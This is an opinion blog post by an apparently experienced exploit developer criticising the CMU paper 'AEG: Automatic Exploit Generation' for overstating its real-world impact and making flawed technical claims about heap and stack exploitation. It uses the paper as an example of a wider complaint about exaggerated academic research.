Sometimes I read a research paper, usually in the area where computer science meets application, and it’s obvious that the authors are far overstating the practical impact of the work. This can be due to the researchers simply not having any exposure to the practical side of the field in which they are investigating and thus accidentally (through ignorance) overstate their claims. Alternatively it can be a purposeful and deliberate attempt to mislead and posture in front of a readership that hopefully won’t know any better.
The first case is presumably simple ignorance but is still lamentable. The obvious solution here is to avoid making such claims at all. If the research cannot stand on its own then perhaps it is not worthwhile? Researchers (both academic and industrial) have a habit of jumping on problems they underestimate, throwing a variety of techniques at them, hoping one sticks and then calling the problem solved. This typically occurs when they are not actually required to solve the problem correctly and robustly but merely as a ‘prototype’. They then get pilloried by anyone who actually has to solve the problem properly and almost always because of a disparity between claims made and the real impact rather than issues with methodology, recording or technical aspects.
The second case is far more insidious and unfortunately I think not uncommon. In academic research it can be easy to impress by combining cutting edge, but not necessarily original, research with a practical problem, sort-of solving parts of it and like before declaring it solved. Often followed quickly by phrases involving ‘game changing’, ‘paradigm shifting’ and so forth. Personally, I think this is a serious problem in the research areas that are less theoretical and more practical. Often the investigators refuse to accept they aren’t actually aware of the true nature of the problem they are dealing with or how it occurs in the real world. Egotistically this is difficult as they are often lauded by their academic peers and therefore surely must grasp the trivialities of the practical world, no? At this point a mixture of ego, need to impress and lack of ethics combine to give us papers that are at best deluded and at worst downright wrong.
Regardless of whether a paper ends up making such claims mistakenly for the first or the second reason the result is the same. It cheapens the actual value of the research, results in a general loss of respect for the capabilities of academia, deludes the researchers further and causes general confusion as to where research efforts should be focused. Worse still is when attempts to overstate the impact are believed by both the media and other researchers resulting in a complete distortion between the actual practical and theoretical value of the research and it’s perceived impact.
Now, on to the paper that has reminded me of this most recently: The latest paper from David Brumleys group at CMU titled “AEG: Automatic Exploit Generation“. I was looking forward to reading this paper as it was the area I worked on during my thesis but quite honestly it’s incredibly disappointing at best and has serious factual issues at worst. For now let’s focus on the topic at hand ‘overstating the impact of academic research cheapens it and spreads misinformation‘. With the original Patch-Based Exploit Generation paper we had all sorts of stories about how it would change the way in which patches had to be distributed, how attackers would be pushing buttons to generate their exploits in no time at all and in general how the world was about to end. Naturally none of this happened and people continued to use PatchDiff. Unfortunately this is more of the same.
Near the beginning of the most recent paper we have the following claim “Our automatic exploit generation techniques have several immediate security implications. First, practical AEG fundamentally changes the perceived capabilities of attackers“. This statement is fundamentally flawed. It assumes that practical AEG is currently possible on bugs that people actually care about. This is patently false. I’ve written one of these systems. Did it generate exploits? Yes it did. Is it going to pop any program running on a modern operating system with the kinds of vulnerabilities we typically see? Nope. That would require at a minimum another 2 years of development and at that point I would expect a system that is usable by a skilled exploit writer as an augmentation of his skillset rather than a replacement. The few times I did use the tool I built for real exploits it was in this context rather than full blown exploit generation. The system discussed in the mentioned paper has more bells and whistles in some areas and is more primitive in others and it is still an unfathomable distance from having any impact on a realistic threat model.
Moving on, “For example, previously it has been believed that it is relatively difficult for untrained attackers to find novel vulnerabilities and create zero-day exploits. Our research shows this assumption is unfounded“. It’s at this point the distance between the authors of this paper and the realities of industrial/government/military vulnerability detection and exploit development can be seen. Who are the people we are to believe have this view? I would assume the authors themselves do and then extrapolated to the general exploit creating/consuming community. This is an egotistical flaw that has been displayed in many forays by academia into the vulnerability detection/exploit generation world.
Let’s discuss this in two parts. Firstly, in the context of the exploits discussed in this paper and secondly in the context of exploits seen in the real world.
In the case of the bug classes considered in the paper this view is entirely incorrect. Anyone who looks at Full Disclosure can regularly see low hanging bugs being fuzzed and exploited in a cookie cutter style. Fuzz the bug, overwrite the SEH chain, find your trampoline, jump to your shellcode bla bla bla rinse and repeat, start a leet h4x0r group and flood Exploit DB. All good fun, no useful research dollars wasted. The bugs found and exploited by the system described are of that quality. Low hanging, fuzzable fruit. The ‘training’ involved here is no more than would be required to set up, install and debug whatever issues come up in the course of running the AEG tool. In our most basic class at Immunity I’ve seen people who’ve never seen a debugger before writing exploits of this quality in a couple of days.
For more complex vulnerabilities and exploits that require a skilled attacker this AEG system doesn’t change the threat model. It simply doesn’t apply. A fully functional AEG tool that I can point at Firefox and press the ‘hack’ button (or any tool that had some sort of impact on real threats. I’d be happy with exploit assistance rather than exploit generation as long as it works) would of course, but we are a long, long way from that. This is not to say we won’t get there or that this paper isn’t a step in the right direction but making the claim now is simply laughable. To me it just reeks of a research group desperate to shout ‘FIRST!’ and ignoring the real issues.
A few more choice phrases for your viewing pleasure:
“Automated exploit generation can be fed into signature generation algorithms by defenders without requiring real-life attacks” – Fiction again. This would be possible *if* one had a usable AEG system. The word I presume they are looking for is *could*, “could be fed into”.
“In order to extend AEG to handle heap-based overflows we would need to also consider heap management structures, which is a straight-forward extension” – Again, this displays a fundamental ignorance of what has been required to write a heap exploit for the past six or so years. I presume they heard about the unlink() technique and investigated no further. Automatic exploit generation of heap exploits requires one to be able to discover and trigger heap manipulation primitives as well as whatever else must be done. This is a difficult problem to solve automatically and one that is completely ignored.
In reference to overflows that smash local variables and arguments that are dereferenced before the function returns and therefore must be valid – “If there is not enough space to place the payload before the return address, AEG can still generate an exploit by applying stack restoration, where the local variables and function arguments are overwritten, but we impose constraints that their values should remain unchanged. To do so, AEG again relies on our dynamic analysis component to retrieve the runtime values of the local variables and arguments” – It’s at this point that I start to wonder if anyone even reviewed this thing. In any program with some amount of heap non-determinism, through normal behaviour or heap base randomisation, this statement makes no sense. Any pointers to heap allocated data passed as arguments or stored as local variables will be entirely different. You may be lucky and end up with that pointer being in an allocated heap region but the chances of it pointing to the same object are rather slim in general. Even in the context of local exploits where you have much more information on heap bases etc. this statement trivialises many problems that will be encountered.
Conclusion
With the above paper I have two main issues. One is with the correctness of some of the technical statements made and the other is with distortion between reality and the stated impact and generality of the work. For the technical issues I think the simple observation that they are there is enough to highlight the problem. The flawed statements on impact and generality are more problematic as they display a fundamental corruption of what a scientific paper should be.
I have a deep respect for scientific research and the ideals that I believe it should embody. Much of this research is done by university research groups and some of the papers produced in the last century are among humanities greatest intellectual achievements. Not all papers can be revolutionary of course but even those that aren’t should aim to uphold a level of scientific decorum so that they may contribute to the sum of our knowledge. In my opinion this single idea should be at the heart of any university researcher being funded to perform scientific investigation. A researcher is not a journalist nor a politician and their papers should not be opinion pieces or designed to promote themselves at the expense of facts. There is nothing wrong with discussing perceived impact of a paper within the paper itself but these statements should be subjected to the same scientific rigour that the theoretical content of the paper is. If one finds themselves unqualified (as in the above paper) to make such statements then they should be excluded. Facts are all that matter in a scientific paper, distorting them through ignorance is incompetence, distorting them on purpose is unethical and corrupt.